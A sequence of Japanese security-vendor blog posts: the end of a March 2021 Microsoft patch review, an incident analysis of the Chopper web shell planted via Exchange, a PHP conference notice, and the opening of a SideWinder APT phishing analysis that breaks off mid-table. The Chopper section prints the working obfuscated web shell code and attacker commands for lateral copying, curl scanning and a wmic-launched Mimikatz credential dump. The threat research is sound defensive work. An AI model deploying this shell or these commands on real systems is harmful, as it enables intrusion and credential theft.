CVE-2021-26854 Microsoft Exchange Server のリモートコード実行の脆弱性 重要 6.6 いいえ いいえ RCE
CVE-2021-27078 Microsoft Exchange Server のリモートコード実行の脆弱性 重要 9.1 いいえ いいえ RCE
CVE-2021-27058 Microsoft Office ClickToRunのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-24108 Microsoft Officeのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27057 Microsoft Officeのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27059 Microsoft Officeのリモートコード実行の脆弱性 重要 7.6 いいえ いいえ RCE
CVE-2021-26859 Microsoft Power BIの情報漏えいの脆弱性 重要 7.7 いいえ いいえ Info
CVE-2021-27056 Microsoft PowerPointのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27052 Microsoft SharePoint Serverの情報漏えいの脆弱性 重要 5.3 いいえ いいえ Info
CVE-2021-27076 Microsoft SharePoint Serverのリモートコード実行の脆弱性 重要 8.8 いいえ いいえ RCE
CVE-2021-24104 Microsoft SharePointのなりすましの脆弱性 重要 4.6 いいえ いいえ Spoof
CVE-2021-27055 Microsoft Visioのセキュリティ機能のバイパスの脆弱性 重要 7 いいえ いいえ SFB
CVE-2021-26887 Microsoft Windowsフォルダリダイレクトの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26881 Microsoft Windows Media Foundationのリモートコード実行の脆弱性 重要 7.5 いいえ いいえ RCE
CVE-2021-27082 Quantum Development Kit for Visual Studio Codeのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-26882 Remote Access API の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-27083 Remote Development Extension for Visual Studio Codeのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-26880 Storage Spaces Controllerの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26886 User Profile Serviceのサービス拒否の脆弱性 重要 5.5 いいえ いいえ DoS
CVE-2021-27081 Visual Studio Code ESLint Extensionのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27084 Visual Studio Code Java Extension Packのリモートコード実行の脆弱性 重要 記載なし いいえ いいえ RCE
CVE-2021-27060 Visual Studio Codeのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-27070 Windows 10 Update Assistantの特権昇格の脆弱性 重要 7.3 いいえ いいえ EoP
CVE-2021-26869 Windows ActiveX Installer Serviceの情報漏えいの脆弱性 重要 5.5 いいえ いいえ Info
CVE-2021-27066 Windows Admin Center セキュリティ機能バイパスの脆弱性 重要 4.3 いいえ いいえ SFB
CVE-2021-26860 Windows App-V Overlay Filterの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26865 Windows Container Execution Agentの特権昇格の脆弱性 重要 8.8 いいえ いいえ EoP
CVE-2021-26891 Windows Container Execution Agentの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26896 Windows DNS Server のサービス拒否の脆弱性 重要 7.5 いいえ いいえ DoS
CVE-2021-27063 Windows DNS Server のサービス拒否の脆弱性 重要 7.5 いいえ いいえ DoS
CVE-2021-26877 Windows DNS Serverのリモートコード実行の脆弱性 重要 9.8 いいえ いいえ RCE
CVE-2021-26893 Windows DNS Serverのリモートコード実行の脆弱性 重要 9.8 いいえ いいえ RCE
CVE-2021-26894 Windows DNS Serverのリモートコード実行の脆弱性 重要 9.8 いいえ いいえ RCE
CVE-2021-26895 Windows DNS Serverのリモートコード実行の脆弱性 重要 9.8 いいえ いいえ RCE
CVE-2021-24090 Windows Error Reportingの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26872 Windows Event Tracing の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26898 Windows Event Tracing の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26901 Windows Event Tracing の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-24107 Windows Event Tracing の情報漏えいの脆弱性 重要 5.5 いいえ いいえ Info
CVE-2021-26892 Windows Extensible Firmware Interface のセキュリティ機能バイパスの脆弱性 重要 6.2 いいえ いいえ SFB
CVE-2021-26868 Windows Graphics Componentの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26861 Windows Graphics Componentのリモートコード実行の脆弱性 重要 7.8 いいえ いいえ RCE
CVE-2021-26862 Windows Installer の特権昇格の脆弱性 重要 6.3 いいえ いいえ EoP
CVE-2021-26884 Windows Media Photo Codec の情報漏えいの脆弱性 重要 5.5 いいえ いいえ Info
CVE-2021-26879 Windows NAT Denial of Service Vulnerability 重要 7.5 いいえ いいえ DoS
CVE-2021-26874 Windows Overlay Filter の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-1640 Windows Print Spooler の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26878 Windows Print Spooler の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26870 Windows Projected File System の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26866 Windows Update Service の特権昇格の脆弱性 重要 7.1 いいえ いいえ EoP
CVE-2021-26889 Windows Update Stack の特権昇格の脆弱性 重要 7.1 いいえ いいえ EoP
CVE-2021-1729 Windows Update Stack Setup の特権昇格の脆弱性 重要 7.1 いいえ いいえ EoP
CVE-2021-26899 Windows UPnP Device Host の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26873 Windows User Profile Service の特権昇格の脆弱性 重要 7 いいえ いいえ EoP
CVE-2021-26864 Windows Virtual Registry Providerの特権昇格の脆弱性 重要 8.4 いいえ いいえ EoP
CVE-2021-26871 Windows WalletService の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26885 Windows WalletService の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26863 Windows Win32kの特権昇格の脆弱性 重要 7 いいえ いいえ EoP
CVE-2021-26875 Windows Win32kの特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP
CVE-2021-26900 Windows Win32k の特権昇格の脆弱性 重要 7.8 いいえ いいえ EoP

他の「緊急」レベルのパッチは、2つがAzure Sphereに影響する脆弱性ですが、特に対処する必要はないでしょう。Azure Sphereを実行しているデバイスはインターネットに接続されていれば、自動で更新プログラムが適用されるからです。デバイスがインターネットに接続していない場合には、アップデートが適用されていることを確認する必要があります。HEVC Video Extensions の脆弱性を修正するパッチは 4 つあり、これらのパッチは Windows ストアから入手できます。OpenType フォントのためのパッチは、特別に細工されたフォントを表示することによって悪用できる脆弱性に対処するものです。最後に、Visual Studio の Git 用の興味深いアップデートでは、特権なしで、ある程度のレベルのユーザ操作で悪用することのできるバグを修正しています。攻撃方法の複雑性も低いとされているので、今後この脆弱性についての情報が報告されるかもしれません。

深刻度「重要」レベルの脆弱性に目を移すと、まだ多くのコード実行の脆弱性が残っています。実際、今月3月にパッチが公開された90件の脆弱性のうち、45件が何らかの「リモートコード実行の脆弱性」として報告されています。深刻度「緊急」に該当する脆弱性の影響を受ける「重要」レベルに該当するコンポーネントの多くは、緊急にあわせたアップデートが行われています。これには、Exchange、DNS Server、HVEC Video Extensions、および Internet Explorer が含まれます。今月のリリースには、Visual Studio が影響を受ける5 つの RCE の脆弱性が含まれています。ほとんどは容易に対処できますが、Quantum Development Kit for Visual Studio のアップデートは手動でダウンロードする必要があります。これは Visual Studio の拡張機能ページから行うことができます。また、OfficeやOfficeコンポーネントのアップデートも予想されています。また、先月同様、Microsoft Office 2019 for Macのユーザは、アップデートが利用可能になるまで待つ必要があります。

3月のリリースで対処された 30件 の特権昇格 (Elevation of Privilege、EoP)の脆弱性を見ると、ほとんどは、攻撃者が影響を受けるシステムにログオンし、特権を昇格させるために特別に細工されたコードを実行することを必要とします。これらのパッチのほとんどは、Windows カーネルと様々な Windows コンポーネントに影響を与えます。

今月のリリースには、6つの情報漏えいの脆弱性に対するパッチが含まれています。通常、この種のケースでは、特定されていないメモリの内容で構成された情報の漏えいのみが発生します。これらの脆弱性のうち3つはそうですが、他の脆弱性は、重要な情報の漏えいにつながります。Azure Virtual Machine の脆弱性は、権限の低いユーザが仮想マシンの認証情報や仮想マシンに関連付けられた拡張機能の認証情報を取得することを可能にします。他に認証情報関連では、Microsoft Power BI のバグは NTLM ハッシュを漏えいさせる可能性があり、それによって平文のパスワードが漏えいする可能性があります。最後に、Microsoft 社の記事によると、SharePoint Server の情報漏えいにより、攻撃者は「組織の電子メール、Webサイト、ファイル名、ファイルの URLなど」にアクセスできる可能性があるとされています。このような一般的な説明が記載されているだけであるといえ、貴重な情報が攻撃者によって暴露される可能性があると推測されます。

今月、3つのコンポーネントに対するセキュリティ機能バイパス(security feature bypasses 、SFB)の脆弱性を修正するためのパッチが提供されました。Windows Extensible Firmware Interface と Windows Admin Center の脆弱性にはパッチが公開されていますが、ドキュメントによる情報はありません。Visio 用の SFBの脆弱性 にはいくつか追加の情報がありますが、攻撃のシナリオは一般的なものとは程遠いようです。システムが影響を受けるのは、特定のGroup Policy Objectのみです。さらに攻撃者は、Excelのマクロを有効にしたテンプレートを変更する必要があります。この2つの条件が満たされ、ユーザがそのGroup Policyの影響を受けるシステム上で悪意のあるファイルを実行した場合、何らかの形でセキュリティ機能バイパスが発生する可能性があります。この記事を読む限りでは、差し迫った危険性は感じられませんが、それでもパッチを適用した方が良いでしょう。

今月のリリースでは、4つのサービス拒否(denial-of-service 、DoS)となりすましの脆弱性が含まれています。なりすましのバグは SharePoint サーバで発生しますが、それ以上の情報は提供されていません。DoS バグのうち 2 つは DNS Server サービスに影響を与えるもので、前述のリモートコード実行のバグと同様の注意事項があります。また、NAT Serverサービスにも DoS のバグがあります。これらのバグについては、サービスの再起動だけで済むのか、システムの完全な再起動が必要なのかは不明です。最後の DoS のバグは ZDI programを通じて報告されたものです。こちらはサービスへの影響は与えませんが、代わりにUser Profile Serviceのバグを指摘しています。ジャンクションを作成することで、攻撃者はサービスを悪用して選択したファイルの内容を上書きし、DoS攻撃を発生させることができます。

最後に、Servicing Stack のアドバイザリ(ADV990001)が複数のバージョンのWindows向けに修正されました。その他、今月は追加のアドバイザリはリリースされていません。

参考記事:

翻訳: 室賀 美和(Core Technology Marketing, Trend Micro™ Research)

The post 2021年3月のセキュリティアップデートレビュー解説 first appeared on トレンドマイクロ セキュリティブログ.
h-heyerlein-ndja2LJ4IcM-unsplash

Webシェル「Chopper」を利用した最近の標的型攻撃事例を解説

本ブログ記事では、トレンドマイクロが最近調査したASPX Webシェル「Chopper」(本記事紹介の事例に関連する検体は「Backdoor.ASP.WEBSHELL.UWMANA」として検出)を利用した標的型攻撃の手法について解説します。この事例ではWebシェルの設置に、Microsoft Exchange Server の脆弱性が利用されたものと推測しています。

■Webシェルとは?

「Webシェル(Web Shell)」とは、Web経由でのコマンド実行を可能にするバックドアの一種です。Webシェルはシンプルで使いやすく、システムを侵害する目的で利用された際に非常に強力な力を発揮します。Webシェルのコードは、ASP、PHP、JSP、あるいはWebを通過するパラメータを持ったシステムコマンドを実行できる、どのような任意のスクリプトでも記述することが可能です。わずか15バイト程度でも感染システムのリモート操作を可能にするWebシェルは、サーバ上に設置されたことに気づけないことも多々あります。特にセキュリティレイヤーが統合されていない場合はなおさらです。

Webシェルは既に一般的な攻撃手段となっており、その使用だけで攻撃者の特徴とできるものではありません。これは逆に、標的型攻撃において、特定の攻撃者によらず広く使用される可能性があることを意味します。Microsoft Detection Response Team(DART)は2021年2月、Webシェルを使用する攻撃が倍増していることを報告しています。法人組織のセキュリティ担当者はWebシェルがどのように攻撃に使用されるかを認識する必要があるものと言えるでしょう。

■調査事例に対する技術的分析

侵入

今回の事例では、攻撃の背後にいるサイバー犯罪者は、外部と接続したOutlook Web App (OWA) サーバ内にWebシェル「Chopper」であるASPXファイルをドロップしていました。これにより攻撃者は、永続性を確立させ攻撃基盤を確立し、そのサーバを介してリモートコマンドを送信することを可能にしました。

Outlook Web App (Web Directory) – D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\15.1.2044\scripts\premium\premium.aspx

可能性としてはMicrosoft Exchange Serverの脆弱性を悪用し、遠隔でWebシェルをドロップしたものと推測されます。本事例の調査時点で公表されていたMicrosoft Exchange Serverの脆弱性として、リモートコード実行が可能になる「CVE-2020-0688」がありました。Microsoftは2020年2月、この脆弱性に対処するための修正プログラムを公開しています。また、同社は2021年3月2日、Microsoft  Exchange Serverに関する複数の脆弱性(CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-26858)と、それらを利用したゼロデイ攻撃が既に発生していたことを報告しています。ただし、本記事の事例においていずれの脆弱性が使用されたか、現時点では断定できていません。

以下は、Chopperの攻撃の特徴となるスクリプトです。

<%@ Page Language=”Jscript” Debug=true%>

<%

var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(“UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=”));

var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(“dW5zYWZl”));

var c=eval(a,b);

eval(c,b);

%>

不正なスクリプトは簡単にすると以下のようになります。「eval」が実行者で、「Request.Form」 が実行されるパラメータを取得します。

<%@ Page Language=”Jscript”%><%eval(Request.Form[“Command”],”unsafe”);%>

いくつかの攻撃例で、攻撃者が検出を回避するために以下の短いスクリプトを挿入していることが確認されています。

図1:-検出回避のため挿入されたと考えられる短いスクリプトの例
図1: 検出回避のため挿入されたと考えられる短いスクリプトの例

ユーザの特定

Chopperがシステム感染に成功すると、攻撃者は、プライマリユーザ、または現在システムにログオンしているユーザを特定するために、コマンド「query user(quser)」を実行します。トレンドマイクロの調査では、このコマンド「quser」は、アクティブなリモートセッションを特定するために攻撃全体を通して繰り返し使用されていました。

図2:コマンド「quser」-がアクティブなリモートセッションを識別するために使用される
図2:コマンド「quser」 がアクティブなリモートセッションを識別するために使用される

難読化解除技術

Chopperはツールを展開するため、感染システムにドロップしたパッケージファイルを、コマンド「expand」を利用して解凍します。

expand {filename}.ex_ {filename}.dat

expand {filename}.ex_ {filename}.exe

Chopperによる他の攻撃と比較して、当該攻撃には顕著な相違点が見られました。それは、ユーザプロファイルのntuser.datなどのデータ保存目的で一般的に使用されている「.dat」拡張子の使用です。この攻撃においては.datファイルが実行ファイルとして使用されていました。

横展開(内部活動)

その後、Webシェル「Chopper」を他のホストのアクセス可能な共有フォルダにコピーし、アクセス権を得ようとします。

copy premium.aspx “\\{hostname}\d$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\15.1.2044\scripts\premium

また、インストールされたハッキングツール 「Hacktool.Win32.CATLIKE.A」 と、正規の cURL であるC:\tempcurl.dat を使用して、脆弱性を見つけるためにネットワーク全体をスキャンします。

特に、Apache Tomcat、Citrix、phpMyAdminアプリケーションに存在するWebサーバ関連の脆弱性とパスワードの弱点についてスキャンします。

アプリケーションまたはポート コマンド
Oracle WebLogic curl.dat -v -H ‘Content-Type: text/xml;charset=UTF-8’ http://{ipアドレス\]:7001/wls-wsat/CoordinatorPortType
Oracle Console curl.dat -vv http://{ipアドレス}:7001/console/j_security_check  -d j_username={ユーザ名}&j_password={パスワード}&submit=Login”
PHPMyAdmin curl.dat -vv –connect-timeout 2 {ipアドレス}/phpmyadmin
Apache Tomcat s.dat -u http://{ipアドレス}:8080/manager/html

ポート

  • 7001
  • 9095
  • 5556
  • 8080
s.dat -i 10.217.229.189 -p {ポート}  

表 1:特定のアプリケーションとポートに存在する
Webサーバ関連の脆弱性とパスワードをスキャンするために使用されるコマンド

この攻撃では、WMI コマンドライン (wmic) ユーティリティを利用して他の感染エンドポイントにリモートでプロセスが実行されることも確認しました。

セッション ID を介した任意のコマンドの実行

脆弱性攻撃成功後に設置されたChopperは、システムの特権にアクセスすることが可能です。そして、エンドポイントの一つに「Trojan.Win32.PRIVESC.A」をドロップして実行します。このトロイの木馬型マルウェアは、「SeTcbPrivilege」の特権を持つユーザの下で実行される必要があります。これにより、攻撃者はすべてのWindowsセッションを見ることができ、セッションIDを介してセッション上で任意のコマンドを実行することができます。

 

図3:セッション-ID-を介してセッション上で実行される任意のコマンドの例

図3:セッション-ID-を介してセッション上で実行される任意のコマンドの例_2

図3:セッション-ID-を介してセッション上で実行される任意のコマンドの例_3
図3:セッション ID を介してセッション上で実行される任意のコマンドの例

情報探索

情報探索には、nltestpingwhoaminetstatnet、nslookup、hostname、tasklistなど、他の攻撃においてもよく利用される代表的なWindowsコマンドラインツールを使用しています。また、一般に公開されており、攻撃者およびドメイン管理者の間で非常に人気のある「LG.exe」と呼ばれるJoeWareドメインツールがインストールされており、攻撃に使用されていました。

認証情報へのアクセス

ユーザの認証情報を取得するために、攻撃者はオープンソースのアプリケーションMimikatzの修正版である「HackTool.MSIL.Mimikatz.AF」を、パラメータ「x, xxx, xxxx, xxxx, xxxasd」で利用して使用していました。

wmic /node:{ip address} process call create “cmd.exe /c c:\users\mpBD6D42.dat xxxasd -pass > c:\users\23.txt 

収集

攻撃者は「wevtutil.exe」を使用して、標的のユーザ名からセキュリティ関連イベントを照会し、q.txtファイルとしてエクスポートします。窃取した認証情報やその他のログをパッケージングするためにはrar.exeなどのサードパーティ製アプリケーションは利用せず、代わりにコマンド「makecab」を使用します。

·        makecab a.txt > 111

·        makecab aaa2.txt >1

攻撃者は、インストールされているセキュリティコンポーネントやアプリケーションをファイル名として使用して、目につかないように隠蔽します。

·        C:\Program Files\Trend Micro\ ams p.dat

·        C:\Oracle\Oracle.dat

·        C:\Program Files\McAfee\MacAfee.dat

これらWebシェル「Chopper」の不審な活動は、トレンドマイクロのXDR ソリューションによって確認することができました。XDRソリューションによって、観察可能な攻撃手法を監視し、異常なファイル拡張子の実行、システムツールを介したリモート実行、Webシェル関連の活動、および潜在的な脆弱性悪用攻撃などの重要なセキュリティ警告が提供されます。

■被害に遭わないためには

Webシェルは、脆弱性などのセキュリティの隙を突くことによってシステムに埋め込まれる可能性があります。攻撃者は、システムで使用されている脆弱性を持つアプリケーションを特定して悪用し、リモートコードの実行やデータの抽出を目的に、Webシェルをインストールします。

法人組織を狙うWebシェル攻撃から確実に防御するための、いくつかのセキュリティ推奨事項をご紹介します。

  • システムおよびアプリケーションにパッチを当てる:
    Microsoft Exchange Server、Apache Tomcat、Oracle Web Logic Server、PHPMyAdmin などの公開アプリケーションの脆弱性には、対処する修正プログラムが適用されていることを確認する
  • 破られにくいパスワードを導入する:
    複数のアプリケーションやWebサイトで同じパスワードを使用しない。可能な限り多要素認証など追加のセキュリティを使用する
  • IIS web.config ファイルに静的鍵があるかどうかをチェックする:
     CVE-2020-0688 で確認されたように、ランダムに生成された鍵ではなく静的鍵を使用すると、攻撃者がサーバを欺き、 ViewState データをデシリアライズし、任意のコードを実行することが可能になることに注意する

法人組織は、高度な攻撃や脅威から重要なデータを保護するため、信頼性の高いアラートに基づいた包括的かつ効率的な保護、検出、予防、および修復をリアルタイムで行う必要があります。すべてのセキュリティセンサーを統合して表示することにより、一カ所で確認することができるため、迅速かつ徹底した調査と対応を実施することができます。  

■トレンドマイクロの対策

Trend Micro XDR™」は、メール、エンドポイント、サーバ、クラウドワークロード、ネットワークなど、トレンドマイクロのソリューションによって各組織から収集されたデータセットに、最も効果的な専門的分析を適用し、攻撃を特定して阻止するための迅速な対応を実現します。強力な人工知能(AI)と専門家によるセキュリティ分析により、お客様の環境から得られるデータとトレンドマイクロのグローバルな脅威インテリジェンスを相関させ、より少ない頻度で、より忠実度の高いアラートを配信し、さらなる早期発見を実現します。優先度の高い最適化されたアラートを1つのコンソールで提供し、ガイド付き調査でサポートすることで、攻撃の経路および組織へ及ぼす影響を完全に把握するために必要なステップを簡素化します。

侵入の痕跡(Indicators of Compromise 、IoCs

侵入の痕跡(Indicators of Compromise、IoCs)は、こちらを参照してください。

参考記事:

翻訳: 室賀 美和(Core Technology Marketing, Trend Micro™ Research)

 

The post Webシェル「Chopper」を利用した最近の標的型攻撃事例を解説 first appeared on トレンドマイクロ セキュリティブログ.
sora-sagano-WFSap6CIXuw-unsplash

International PHP Conference Berlin 2021

The International PHP Conference is the world's first PHP conference and stands since more than a decade for top-notch pragmatic expertise in PHP and web technologies. At the IPC, internationally renowned experts from the PHP industry meet up with PHP users and developers from large and small companies. Here is the place where concepts emerge and ideas are born - the IPC signifies knowledge transfer at highest level.

All delegates of the International PHP Conference have, in addition to PHP program, free access to the entire range of the webinale taking place at the same time.

Basic facts:

Date: June 7 ‒ 11, 2021

Location: Maritim ProArte Hotel, Berlin or Online

Highlights:

  • 60+ best practice sessions
  • 50+ international top speakers
  • PHPower: Hands-on Power Workshops
  • Expo with exciting exhibitors on June 8 & 9
  • Conference Combo: Visit the webinale for free
  • All inclusive: Changing buffets, snacks & refreshing drinks
  • Official certificate for attendees
  • Free Swag: Developer bag, T-Shirt, magazines etc.
  • Exclusive networking events

For further information on the International PHP Conference Berlin visit: www.phpconference.com/berlin-en/

h-heyerlein-ndja2LJ4IcM-unsplash

領土問題をスピアフィッシングに利用するサイバー犯罪者集団「SideWinder」の手口

トレンドマイクロは、南アジア地域とその周辺国を攻撃対象としているとされるサイバー犯罪者集団「SideWinder(サイドワインダー)」の活動を追跡調査する中で、悪意のあるショートカット(LNK)ファイルを配信し、複数のフィッシングページを構築するために使用されているサーバを特定しました。これらのフィッシングページは、正規Webメールのログインページを偽装して作成されたのち、フィッシング攻撃に利用するために構造が改ざんされていることがわかりました。これらの攻撃手口は、標的型メール(スピアフィッシングメール)経由で拡散されていると考えられます。

SideWinderが標的とする攻撃対象には多国の政府機関や軍の部隊が含まれており、主にネパールとアフガニスタンが狙われているとされています。一部のフィッシングページは、詐取した認証情報をSideWinderの管理するコマンドアンドコントロール(C&C)サーバに送信した後、ユーザを別のドキュメントあるいはニュースページにリダイレクトします。リダイレクト先で表示される論題やトピックは、新型コロナウイルス(Covid-19)、または、ネパール、パキスタン、インド、中国間で続く国境紛争に関連しています。加えてこれらのフィッシングページへと誘導する手口は、標的型メールに記されたフィッシングリンクを介して拡散されていると考えられます。

さらに弊社の調査では、フィッシングページが構築されたサーバ上で複数のAndroid向けAPKファイルが発見されました。いくつかは無害なAPKファイルでしたが、脆弱性攻撃コードを検証するフレームワーク「Metasploit」を悪用して作成された不正APKファイルが見つかりました。無害なアプリの1つとして発見された「OpinionPoll」は、ネパール・インド間で続く国境紛争に関する意見を収集するための調査アプリです。OpinionPollでは、SideWinderがスピアフィッシング攻撃に用いた誘導手口とは別の政治的な話題を利用しているように見えます。弊社は、これらのアプリがまだ開発段階にあると考えていますが、将来的にはモバイル端末を侵害するために利用されると推測しています。

SideWinderは2020年に、非常に活発な攻撃活動を繰り広げていました。トレンドマイクロは2020年1月20日公開のブログ記事で、標的型攻撃を行うSideWinderがAndroid端末の主要なプロセス間通信システム上に存在する脆弱性「CVE-2019-2215」を悪用し、開放されたメモリへの再アクセスを可能にする「UAF(Use After Free)脆弱性」を悪用した最初の攻撃事例について報告しました。さらにSideWinderは、Covid-19に関連するファイルを誘導手口に利用して、パキスタン、バングラデシュ、中国に攻撃を仕掛けました

不正ドキュメントの解析

不正ドキュメントを使用する手口は、SideWinderが最も利用する感染経路の1つです。弊社は、SideWinderが実施した拡散活動(キャンペーン)から、次のようないくつかの異なる検体を収集しました。

  1. RTFファイルをダウンロードしてJavaScriptファイルをドロップするLNKファイル
  2. HTAファイルをダウンロードするLNKファイルを含むZIPファイル(JavaScriptを使用)
  3. JavaScriptファイルをドロップするRTFファイル
  4. JavaScriptストリームが埋め込まれたPDFファイル
  5. OLEオブジェクト(RTFファイル)への外部リンクを含むDOCXファイル。このファイルは、JavaScriptファイルを含んでおり、ドロップする
図1:不正HTAファイルのダウンロードに使用されるLNKファイルを含むダウンロードされたZIPファイルの一例
図1:不正HTAファイルのダウンロードに使用されるLNKファイルを含むダウンロードされたZIPファイルの一例

上記の不正ドキュメントはすべて、ファイルをダウンロードするかドロップするかのいずれかを実行すると、JavaScriptコードを実行します。実行されるJavaScriptのコードは、メインのバックドア型マルウェアおよび情報窃取型マルウェアの組み合わせ(以後、バックドア+スティーラ)をインストールするために使用されるドロッパです。

ダウンロードされたRTFファイルは、遠隔でのコード実行が可能になるMicrosoft Officeの脆弱性「CVE-2017-11882」を悪用します。そして、JavaScriptのコードで記述されたファイル「1.a」をドロップします。ファイル「1.a」は、ProgramDataフォルダ内にバックドア+スティーラをドロップして直接実行するか、ドロップしたファイルを後で実行するためにスケジュールされたタスクを作成します。

図2:ドロップしたバックドア+スティーラを実行するコマンドを含むスケジュールされたタスク
図2:ドロップしたバックドア+スティーラを実行するコマンドを含むスケジュールされたタスク

新たに作成されたフォルダ内には、Windowsの正規アプリであるRekeywiz(EFS REKEY wizard、FA86B5BC5343CA92C235304B8DCBCF4188C6BE7D4621C625564BEBD5326ED850)を含むいくつかのファイルが含まれています。

図3:ドロップされたファイルの一覧
図3:ドロップされたファイルの一覧

このアプリは、shell32の遅延インポート(DelayImport)の1つであるDUser.dllをサイドロードするshell32.dllを含むさまざまなシステムDLLライブラリを読み込みます。

図4:shell32ライブラリの遅延インポートとして機能するDUserライブラリ
図4:shell32ライブラリの遅延インポートとして機能するDUserライブラリ

ただし、偽のDUser.dllがプロセス内に読み込まれます。この偽のDLLライブラリは、同じディレクトリ内に存在するTEMPファイルからメインのバックドア+スティーラを復号します。

図5:メインのバックドア+スティーラおよび環境設定ファイルの両方を復号するためのアルゴリズム
図5:メインのバックドア+スティーラおよび環境設定ファイルの両方を復号するためのアルゴリズム

復号プロセスには単純なXOR(排他的論理和)演算が使用されます。復号鍵は、暗号化されたファイルの最初の32バイトであり、残りのバイト数がペイロードです。ここで復号されたペイロードは、メインのバックドアの.NETを用いた実行可能バイナリです。

図6:クラスとリソースを一覧表示させた、復号されたメインのSystemApp
図6:クラスとリソースを一覧表示させた、復号されたメインのSystemApp

図6のResources内に存在するDefaultのリソースには、暗号化された環境設定が含まれています。環境設定が復号されると、攻撃者が標的としているファイル形式が明らかとなります。復号には、メインのバックドア+スティーラに用いた手順と同じ原理が使用されます。

図7:復号された環境設定
図7:復号された環境設定

バックドア+スティーラの主な機能は次のとおりです。

  1. .NETの実行可能ファイルをダウンロードして実行する
  2. システム情報を収集し、C&Cサーバにアップロードする
  3. 選択したファイルをC&Cサーバにアップロードする

ここで収集される情報はJSON形式であるため、上掲図6のResources内に格納されているNewtonsoft_Jsonライブラリが読み込まれることがわかります。バックドア+スティーラによって、次のような情報が収集されます。

  • 特権
  • ユーザアカウント
  • コンピュータ(感染端末の)システム情報
  • ウイルス対策製品
  • 実行中のプロセス
  • プロセッサ情報
  • オペレーティングシステム(OS)情報
  • タイムゾーン
  • インストールされているWindowsのバージョン
  • ネットワーク情報
  • 「Users\%USERNAME%\Desktop」「Users\%USERNAME%\Downloads」「Users\%USERNAME%\Documents」「Users\%USERNAME%\Contacts」内のディレクトリ一覧

上記の他に、すべてのドライブおよびインストールされているアプリ上の情報なども収集されます。

スピアフィッシング攻撃

弊社トレンドマイクロは、SideWinderが不正ドキュメントを配信するために使用したサーバに名前解決を行う興味深いダイナミックDNSドメインをいくつか発見しました。これらのダイナミックDNSドメインのサブドメインは、ユーザが利用するメールサーバのドメインと見た目が同様になるように設計されています。たとえば、ネパール政府機関の正規ドメイン「mail[.]nepal[.]gov[.]np」に偽装するために、偽ドメイン「mail-nepalgovnp[.]duckdns[.]org」が作成されました。さらに深く掘り下げて解析すると、これらの偽ドメイン上には、いくつかのフィッシングページが構築されていることがわかりました。

これらのフィッシングページは、さまざまな正規Webメールサーバのドメインおよびログインページを模範して作成されており、スピアフィッシング攻撃に利用するためにログイン認証情報を窃取するよう改ざんもされています。これらのフィッシングページがユーザや組織にどのように拡散されているかについては明白になっていませんが、SideWinderがこれらのフィッシングページを作成するために模範した正規Webメールサーバを見つけることで、SideWinderが誰を攻撃対象にしていたのかを特定することができます。

フィッシングページを解析した結果、詐取したログイン認証情報をC&Cサーバに送信すると、ほとんどのフィッシングページは正規Webメールサーバにユーザをリダイレクトすることがわかりました。ただし一部のフィッシングページは、ドキュメントまたはニュースページにリダイレクトすることも確認されました。これらのドキュメントやニュースページには、標的であるユーザや組織にとっておそらくは何らかの形で興味を引く論題やトピックが用いられています。そしてこれらの論題の詳細を確認するためにURLリンクをクリックさせ、リンク先の偽ログインページに認証情報を入力させてログインするよう誘導します。これらのドキュメントの一部はCovid-19に関連する一方で、南アジアの領土問題に関するドキュメントやニュースページもいくつか発見されました。

  • India Should Realise China Has Nothing to Do With Nepal’s Stand on Lipulekh(インドは認識する必要がある。リプケーシュ峠におけるネパールの政治的立場と中国が何の関係もないことを)」– 2020年5月にインド・中国間の対立について記述したニュース記事
  • 「India reaction after new pak map.pdf(パキスタンが明示した新たな国境線に対するインドの反応)」– 2020年8月にパキスタンが明示した新たな国境線に対するインドの反応について記述したPDF文書
  • Ambassador Yanchi Conversation with Nepali_Media.pdf(ネパール大使Yanchi氏とネパールメディアの対談)」– Covid-19、中国経済構想「一帯一路(the Belt and Road Initiative)」、およびネパールのフムラ地区が抱える領土問題に関する在中国ネパール大使へのインタビューについて記述したPDF文書

以下の表は、SideWinderが実行したフィッシング攻撃の標的となった組織およびメールサーバ、フィッシングページに用いられたドメイン、および誘導手口に用いられたドキュメントを示しています。

日付 フィッシングページに用いられたドメイン 標的となった組織 標的となったメールサーバ ログイン後のリダイレクト先
2019年11月   ネパールの政府機関 mail.nepal.gov.np ファイル「IMG_0002.pdf」にリダイレクトする
